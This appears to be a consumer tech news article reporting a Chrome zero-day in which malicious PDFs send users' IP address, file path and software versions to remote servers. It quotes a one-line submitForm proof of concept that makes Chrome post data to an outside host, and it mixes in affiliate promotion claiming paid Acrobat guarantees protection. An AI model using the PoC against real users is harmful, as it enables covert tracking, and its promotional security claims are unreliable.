Chrome bug lets hackers collect user data via PDF files

Milan Stanojevic
by Milan Stanojevic
Deputy Editor
Loading Comments
Download PDF
Affiliate Disclosure

  • EdgeSpot discovered an intriguing zero-day vulnerability exploiting PDF documents in Chrome.
  • Hold hackers at bay and keep your sensitive data safe using the PRO version of Adobe Acrobat. Consider adding a VPPN service as well for extra protection.
  • Enhance your PDF experience and find answers to all your PDF-related queries in our dedicated PDF section.
  • Using Chrome? Most of us do and you can keep your favorite browser in pristine condition at all times thanks to our Chrome Troubleshooting Hub.
google chrome

Exploit detection service EdgeSpot discovered an intriguing Chrome zero-day vulnerability exploiting PDF documents. The vulnerability allows attackers to harvest sensitive data using malicious PDF documents opened in Chrome. 

As soon as the victim opens the respective PDF files in Google Chrome, a malicious program starts working in the background by collecting user data.

The data is then forwarded to the remote server that is being controlled by the hackers. You might be wondering what data is being sucked by the attackers, they target the following data on your PC:

  • IP address
  • Full path of the PDF file on the system
  • OS and Chrome versions

Beware of malware-ridden PDF files

You might be surprised to know that nothing happens when Adobe Reader is used for opening PDF files. Additionally, HTTP POST requests are used to transfer data to remote servers without any user intervention.

Experts spotted that one of the two domains readnotify[.]com or burpcollaborator[.]net was receiving the data.

You can imagine the intensity of the attack by considering the fact that most of the antivirus software is not able to detect the samples detected by EdgeSpot.

Experts reveal that the attackers are using the this.submitForm() PDF Javascript API to collect the sensitive information of the users.

We tested it with a minimal PoC, a simple API call like “this.submitForm(‘http://google.com/test’)” will make Google Chrome send the personal data to google.com.

The experts actually found out that this Chrome bug was being exploited by two distinct sets of malicious PDF files. Both of them were circulated in October 2017 and September 2018, respectively.

Notably, the collected data can be used by the attackers to fine-tune attacks in the future. Reports suggest that the first batch of files was compiled using ReadNotify’s PDF tracking service.

Users can utilize the service to keep track of user views.  EdgeSpot has not shared any details regarding the nature of the second set of PDF files.

How to Stay Protected

Download Adobe Acrobat PRO

Adobe Acrobat PRO

Adobe and Chrome make a good match when it comes to handling PDF files. By installing the Adobe Extension for Chrome, you can review and manipulate PDFs to your linking without leaving your favorite browser.

Despite its robust structure, malware hidden in PDF files might not get detected if you’re using the standard version of the Reader.

The professional version is recommended to guarantee your protection and keep your data away from hackers. Although this is not a free of charge service, the price you will pay is rather small for the plethora of additional features you will enjoy including the enhanced security of your PDF files.

There is also a 7 days free trial included so that you can get a taste of the full Pro experience before making the purchase.

Upgrade to Adobe Acrobat PRO DC


In case you want to be secure while surfing the internet, you will need to get a full-dedicated tool to secure your network.  Install now Cyberghost VPN and secure yourself. It protects your PC from attacks while browsing, masks your IP address, and blocks all unwanted access.


The Exploit detection service EdgeSpot wanted to alert the Chrome users about the potential risks because the patch was not expected to be released in the near future.

EdgeSpot reported to Google about the vulnerability last year and the company promised to release a patch late April. However, you can consider using a temporary workaround to the problem by locally viewing the received PDF documents using an alternative PDF reader app.

Alternatively, you can also open your PDF documents in Chrome by disconnecting your systems from the Internet.

FAQ: Learn more about Chrome extensions

  • Does privacy badger work with Chrome?

Privacy Badger is the most popular privacy extension for Chrome (among other browsers), plus it’s free and open-source. Browsec VPN and ZenMate VPN are also good choices. Feel free to explore our top picks for Chrome privacy extensions in this complete guide.

  • Can you edit PDFs in Chrome?

Chrome is a versatile browser that you can easily enhance with a wide range of extensions to edit and save PDF files online. From Adobe Acrobat Reader to PDFescape, there are a lot of options when it comes to extensions that allow PDFs processing. Check out our full guide on this topic.

  • Does Google have a QR code generator?

You can use the dedicated extension in Google Chrome. To do this, open the QR Code Extension page and click on Add to Chrome. Alternatively, you can enter chrome://flags/#sharing-qr-code-generator in the URL bar and select Enabled on the drop-down menu for the Enable sharing page via QR Code setting.

Editor’s Note: This post was originally published in March 2019 and has been since revamped and updated in April 2020 for freshness, accuracy, and comprehensiveness.